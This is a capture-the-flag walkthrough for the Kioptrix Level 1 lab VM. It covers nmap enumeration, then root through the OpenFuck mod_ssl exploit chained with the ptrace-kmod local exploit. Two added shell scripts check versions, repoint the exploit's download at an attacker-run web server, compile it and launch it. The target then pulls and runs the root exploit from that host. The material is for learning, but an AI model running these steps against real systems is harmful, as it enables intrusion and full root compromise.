Kioptrix: Level 1 (#1) walkthrough
The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There is more than one way to successfully complete the challenges.
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Enumeration
1. Get the IP of the target machine (on a lab network, netdiscover or arp-scan will find it).
2. All-time favourite: NMAP
sudo nmap -p- -T4 -A 192.168.103.142
(-p- scans all 65535 TCP ports instead of nmap's default top 1000, -A turns on version detection, OS detection, default scripts and traceroute, and -T4 speeds up the timing; root is needed for the SYN scan and OS fingerprinting.)
We can see the following open TCP ports and services:
- 22 ssh
- 80 http
- 111 rpcbind
- 139 netbios-ssn (SMB)
- 443 https
It’s time to dig deeper. ;p
More Enumeration 🕵️♂️
1. SSH
2. HTTP + HTTPS
From the Server header I can see that it is running Apache 1.3.20 with mod_ssl 2.8.4 on Red Hat Linux; both versions are what the exploit choice below hinges on.
3. RPCBIND
A number of interesting Unix daemons (including NIS+, NFS and CDE components) run as Remote Procedure Call (RPC) services on dynamically assigned high ports. So that clients can find them, a portmapper service (rpcbind) listens on TCP and UDP port 111 and keeps a table of every registered RPC program and the port it is currently using; querying that table with rpcinfo tells you which RPC services are really exposed behind port 111.
Searching Exploit
Let me decode the command — searchsploit apache 1.3.20 | grep remote | grep -v windows
It asks searchsploit for the exploits that apply to Apache 1.3.20, keeps only the "remote" ones (we are attacking the machine over the network) and drops the Windows entries, since we know the target is Linux.
Additionally, we know that the mod_ssl module is loaded in this Apache server. Hence we can guess that the OpenFuck exploit (EDB-ID 47080, listed as targeting Apache mod_ssl < 2.8.7) might work for us: it abuses the SSLv2 KEY_ARG buffer overflow in the OpenSSL that mod_ssl links against (CVE-2002-0082), and the box advertises mod_ssl 2.8.4, which is below that cut-off.
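As an added example (not part of the original write-up), here is a small POSIX shell helper that makes the version check behind that guess explicit: it pulls the Apache, mod_ssl and OpenSSL versions out of a Server header and tests whether mod_ssl is below 2.8.7, the cut-off in the title of EDB-ID 47080. The header string is constructed to look like the one this box returns; the exact banner, the check_target function and its curl invocation are assumptions rather than something taken from the page.

```shell
#!/bin/sh
# Constructed sample header (assumed to resemble what the Kioptrix box sends back to
# `curl -skI https://TARGET/`; it is not a capture from the write-up).
SAMPLE_HEADER='Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b'

# version_of PRODUCT HEADER: print the version that follows "PRODUCT/" in HEADER,
# or nothing if the product is absent (e.g. version_of mod_ssl "$hdr" -> 2.8.4).
version_of() {
    printf '%s\n' "$2" | sed -n "s#.*$1/\([0-9][0-9.a-z]*\).*#\1#p"
}

# version_lt A B: print 1 if dotted version A is numerically below B, else 0.
# Only the numeric prefix of each component is compared ("6b" counts as 6).
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            p = (i <= na) ? x[i] + 0 : 0
            q = (i <= nb) ? y[i] + 0 : 0
            if (p < q) { print 1; exit }
            if (p > q) { print 0; exit }
        }
        print 0
    }'
}

# modssl_exploitable HEADER: succeed when the header advertises a mod_ssl older than
# 2.8.7, the upper bound named in the title of EDB-ID 47080 (OpenFuck).
modssl_exploitable() {
    v=$(version_of mod_ssl "$1")
    [ -n "$v" ] && [ "$(version_lt "$v" 2.8.7)" = 1 ]
}

# check_target HOST: live version of the check (assumed usage; not run when this
# file is loaded). Needs network access to HOST.
check_target() {
    hdr=$(curl -skI "https://$1/" | tr -d '\r' | grep -i '^Server:')
    if modssl_exploitable "$hdr"; then
        echo "$1: mod_ssl $(version_of mod_ssl "$hdr") < 2.8.7, OpenFuck (47080) applies"
    else
        echo "$1: mod_ssl not in range, look elsewhere"
    fi
}
```

The header is the same one the browser or curl shows; the point of scripting it is that the decision (mod_ssl older than 2.8.7) is written down where it can be re-run against the next box instead of eyeballed.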
Exploiting
Here comes the most fun part…👨🎤
We can now compile the exploit code locally and try to run it.
1. Get the exploit file into my working directory and make the changes it needs:
   - searchsploit -m 47080
   - wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c (this is the second stage: after OpenFuck lands a shell as the web server user, it has the target download, compile and run ptrace-kmod.c, the Linux ptrace/kmod local root exploit, CVE-2003-0127)
   - python -m SimpleHTTPServer (serves ptrace-kmod.c from the working directory on port 8000)
   - edit OpenFuck.c so that the wget line which fetches ptrace-kmod.c points at http://<attacker-ip>:8000/ptrace-kmod.c instead of packetstormsecurity.net, so the target pulls the file from us rather than from the Internet.
2. Compile it
   - Requirements: libssl-dev (apt-get install libssl-dev)
   - Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
3. Get the parameters for the executable.
- box = 192.168.103.142
- port = 443
- target = 0x6a or 0x6b (running ./OpenFuck without arguments prints its target list; 0x6a and 0x6b are the two entries for RedHat Linux 7.2 with apache-1.3.20-16, which is what this box reports)
4. Execute
Let me try with 0x6b first; the arguments go in the order target, box, port, and if that offset fails the other one (0x6a) is the next thing to try.
Got into the system…🥳
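Putting the staging steps together, as an added example that is not the author's script: a POSIX shell file that repoints the exploit's download line at our own web server, builds the binary and fires it. It assumes that searchsploit -m 47080 leaves the source as 47080.c (renamed here to OpenFuck.c), that the second-stage command string in the source carries the packetstorm URL quoted above, and that the attacker's address is whatever is passed in. The SAMPLE_LINE is a constructed stand-in for the one line of OpenFuck.c that matters, so the patch function can be exercised without the real source present.

```shell
#!/bin/sh
# URL baked into the exploit's second-stage command (as quoted in the write-up).
PTRACE_URL='http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c'

# Constructed stand-in for the line of OpenFuck.c that needs editing; its shape is an
# assumption made so that patch_openfuck can be tested without the exploit source.
SAMPLE_LINE='#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"'

# patch_openfuck FILE IP [PORT]: rewrite every packetstorm URL in FILE so the target
# fetches ptrace-kmod.c from http://IP:PORT/ (PORT defaults to SimpleHTTPServer's 8000).
# Keeps FILE.bak and prints how many lines now carry the new URL.
patch_openfuck() {
    src=$1; new="http://$2:${3:-8000}/ptrace-kmod.c"
    sed -i.bak "s#$PTRACE_URL#$new#g" "$src"
    grep -c "$new" "$src"
}

# demo_patch IP PORT: apply patch_openfuck to the constructed sample and print the result.
demo_patch() {
    f=$(mktemp)
    printf '%s\n' "$SAMPLE_LINE" > "$f"
    patch_openfuck "$f" "$1" "$2" > /dev/null
    cat "$f"
    rm -f "$f" "$f.bak"
}

# build_openfuck [SRC]: compile as the write-up does; needs libssl-dev for the
# OpenSSL headers and -lcrypto for the link.
build_openfuck() {
    gcc -o OpenFuck "${1:-OpenFuck.c}" -lcrypto
}

# stage ATTACKER_IP TARGET_IP: the whole procedure, for manual use (not run on load).
# Leaves SimpleHTTPServer in the background so the target can pull ptrace-kmod.c,
# then fires the exploit at port 443 with target 0x6b; retry with 0x6a if it fails.
# (python -m SimpleHTTPServer is Python 2; with Python 3 use python3 -m http.server.)
stage() {
    searchsploit -m 47080 && mv 47080.c OpenFuck.c   # assumed output filename
    wget "$PTRACE_URL"
    patch_openfuck OpenFuck.c "$1" 8000
    build_openfuck OpenFuck.c
    python -m SimpleHTTPServer 8000 &
    ./OpenFuck 0x6b "$2" 443
}
```

The reason the URL patch is the one edit that matters: the remote stage only gets a shell as the web server user, and root comes from the target fetching and running ptrace-kmod.c, so if that download silently fails you are left with an unprivileged shell and no error from OpenFuck itself.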
“Supreme excellence consists of breaking the enemy’s resistance without fighting.”
― Sun Tzu, The Art of War